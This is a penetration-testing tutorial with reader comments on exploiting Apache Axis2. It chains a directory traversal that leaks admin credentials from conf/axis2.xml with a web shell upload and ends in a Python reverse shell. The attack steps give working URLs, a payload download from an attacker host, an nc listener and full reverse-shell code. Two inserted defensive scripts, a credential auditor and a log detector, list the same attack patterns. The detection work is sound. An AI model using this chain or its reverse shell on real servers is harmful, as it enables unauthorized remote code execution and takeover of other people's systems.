Disclaimer:
I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.
Prerequisites
For this exploit to work you must have:
- Valid admin console credentials
- Default = admin:axis2
- Public access to the admin console
- https://victim.com/axis2/axis2-admin
Discovery
There are a couple of ways to find credentials for Axis2 servers: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file (conf/axis2.xml), in which the admin console credentials are stored in plain text. It can be discovered using modules in Nmap and OpenVAS.
Nmap
$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
OpenVAS
FYI
- There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
- The code can be found at Github.
- I have tried this exploit multiple times with no success.
Manual Validation
- Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will allow us to get the credentials. They should look like this:
  <parameter name="userName">admin</parameter>
  <parameter name="password">axis2</parameter>
- When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.
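As an added example (not code from the post or from the Axis2 project), here is a small audit script for the defending side: it reads the top-level parameters out of conf/axis2.xml and reports whether the admin console is still on the default admin:axis2 pair shown above. The sample XML is constructed for this example and only contains the parameters that matter here; the 12-character minimum password length is an assumption of this example, not an Axis2 setting.

```python
import sys
import xml.etree.ElementTree as ET

# Default admin console credentials shipped in conf/axis2.xml (as shown in the post)
DEFAULT_USER = "admin"
DEFAULT_PASSWORD = "axis2"
# Minimum password length this example insists on (an assumption of the example, not an Axis2 setting)
MIN_PASSWORD_LENGTH = 12

# Constructed sample: the part of conf/axis2.xml that holds the admin console login
SAMPLE_AXIS2_XML = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
    <parameter name="servicePath">services</parameter>
</axisconfig>
"""


def read_parameters(xml_text):
    """Return {name: value} for every top-level <parameter name="..."> in axis2.xml."""
    root = ET.fromstring(xml_text)
    params = {}
    for p in root.findall("parameter"):
        name = p.get("name")
        if name:
            params[name] = (p.text or "").strip()
    return params


def audit_admin_credentials(xml_text):
    """Return a list of findings about the admin console login; an empty list means nothing to report."""
    params = read_parameters(xml_text)
    findings = []
    user = params.get("userName")
    password = params.get("password")
    if user is None or password is None:
        findings.append("userName/password parameters missing: admin console login is not configured")
        return findings
    if user == DEFAULT_USER and password == DEFAULT_PASSWORD:
        findings.append("default credentials admin:axis2 are in use")
    elif password == DEFAULT_PASSWORD:
        findings.append("default password 'axis2' is in use")
    if len(password) < MIN_PASSWORD_LENGTH:
        findings.append("password is shorter than %d characters" % MIN_PASSWORD_LENGTH)
    return findings


if __name__ == "__main__":
    # Pass the path to a real conf/axis2.xml; with no argument the constructed sample is audited
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_AXIS2_XML
    for finding in audit_admin_credentials(text) or ["no findings"]:
        print(finding)
```

Run it against the deployed webapp's conf/axis2.xml as part of a build or deployment check; a non-empty result means the admin console described in the Prerequisites is usable with credentials anyone can look up, and the traversal above (or a plain guess) is enough to reach it.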
Create the Payload
A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
- Download the file
- Compile the file
- Modify $JAVA_HOME if necessary
- "ant -v" to build
Exploit
- Upload the AxisInvoker.aar service.
- Verify the deployment by checking the Deactivate or Activate service tab.
- Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
- Since stable shells are superior to web shells, we will upgrade to a stable shell. You will need to find out which languages are on the system, or use a system-native option (like nc).
- Get a reverse shell and point it at your host machine.
- I usually get most of my shells from PentestMonkey
- Download your reverse shell from your webserver to the victim machine.
- https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
- Listen for the reverse shell by running "nc -nlvp 443".
- Execute your shell on the victim machine.
- https://victim.com/axis2/services/AxisInvoker/exec?cmd=python%20test.py
- After a few seconds, you should have a shell on your listener!
The Python reverse shell used above (replace <AttackerIP> with your host machine):
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<AttackerIP>",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
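As an added example, and not code from the post or from the AxisInvoker project, the request patterns from the Discovery, Manual Validation and Exploit steps above turned into a small access-log check for the defending side. It flags the xsd=../ read of conf/axis2.xml (also when percent-encoded), any hit on the admin console, and service calls carrying the cmd= and url=/file= parameters the web shell uses. The log lines, source addresses and indicator names are constructed for this example, and the combined access log format of Apache/Tomcat is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (combined log format) showing the sequence described in the post:
# a traversal read of conf/axis2.xml, a visit to the admin console, then web shell calls on the deployed service.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2018:10:01:02 +0000] "GET /axis2/services/Version?wsdl HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2018:10:02:15 +0000] "GET /axis2/services/Version?xsd=../conf/axis2.xml HTTP/1.1" 200 4101 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2018:10:02:40 +0000] "GET /axis2/services/Version?xsd=..%2F..%2Fconf%2Faxis2.xml HTTP/1.1" 200 4101 "-" "curl/7.58.0"
10.0.0.9 - - [12/Mar/2018:10:03:01 +0000] "GET /axis2/axis2-admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2018:10:05:30 +0000] "GET /axis2/services/AxisInvoker/exec?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2018:10:06:10 +0000] "GET /axis2/services/AxisInvoker/download?url=http://203.0.113.7/shell.py&file=shell.py HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2018:10:07:00 +0000] "POST /axis2/services/Version HTTP/1.1" 200 640 "-" "Apache-HttpClient/4.5"
"""

# Source address, timestamp, method, request target and status from a combined/common log line
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return the sorted indicator names that apply to one request target (path plus query string)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    # parse_qs decodes percent-encoding once; unquote again so double-encoded values are normalised too
    query = {k: [unquote(v) for v in vs]
             for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    indicators = set()
    if not path.startswith("/axis2/"):
        return []
    # 1. ?xsd= or ?wsdl= used to step out of the service directory: the pre-1.5.3 read of conf/axis2.xml
    for key in ("xsd", "wsdl"):
        if any(".." in v or "axis2.xml" in v for v in query.get(key, [])):
            indicators.add("config-traversal")
    # 2. any request to the admin console; from an address outside the admin network this is worth a look
    if path.startswith("/axis2/axis2-admin"):
        indicators.add("admin-console")
    # 3. service operations carrying command or fetch parameters, the pattern the AxisInvoker web shell uses
    if path.startswith("/axis2/services/"):
        if "cmd" in query:
            indicators.add("webshell-exec")
        if "url" in query and "file" in query:
            indicators.add("webshell-download")
    return sorted(indicators)


def scan_log(text):
    """Return (src, timestamp, target, indicators) for every line that triggers at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line this parser understands; skip rather than guess
        indicators = classify_request(m.group("target"))
        if indicators:
            hits.append((m.group("src"), m.group("ts"), m.group("target"), indicators))
    return hits


def suspicious_sources(text):
    """Map each source address to the set of indicators it triggered; one address with all of them is the full chain."""
    by_src = {}
    for src, _ts, _target, indicators in scan_log(text):
        by_src.setdefault(src, set()).update(indicators)
    return by_src


if __name__ == "__main__":
    for src, ts, target, indicators in scan_log(SAMPLE_LOG):
        print("%s %s %s %s" % (ts, src, ",".join(indicators), target))
```

Feed it a real Tomcat or Apache access log with scan_log(open(path).read()). One source tripping config-traversal, then admin-console, then webshell-exec is the whole chain from the post; the traversal indicator on its own against a server newer than the versions the post targets still tells you someone is scanning for it.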
Hope that helps in your future pentests!
The issue has been fixed in Axis 2 1.5.3 onwards
What makes you think that it has been fixed?
This exploitation methodology is abusing the administrator privileges to upload a malicious service. I believe this will always be a valid attack vector if you have valid admin credentials and access to the administration panel.
Navigation to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will not work in Axis 2 1.5.3 as they have replaced the transport receiver from SimpleHTTPServer to AxisServletListener. It will not allow you to navigate to the page. You can check my blog below for details:
http://souravdalal.blogspot.in/2018/03/axis-2-directory-traversal-vulnerability.html
Although the directory traversal is no longer valid in updated Axis2 servers, the post is primarily discussing how to manually exploit an Axis2 server to obtain RCE when you have access to the admin console and valid admin credentials. The directory traversal issue is just one of the potential ways to discover those valid credentials.
Thanks!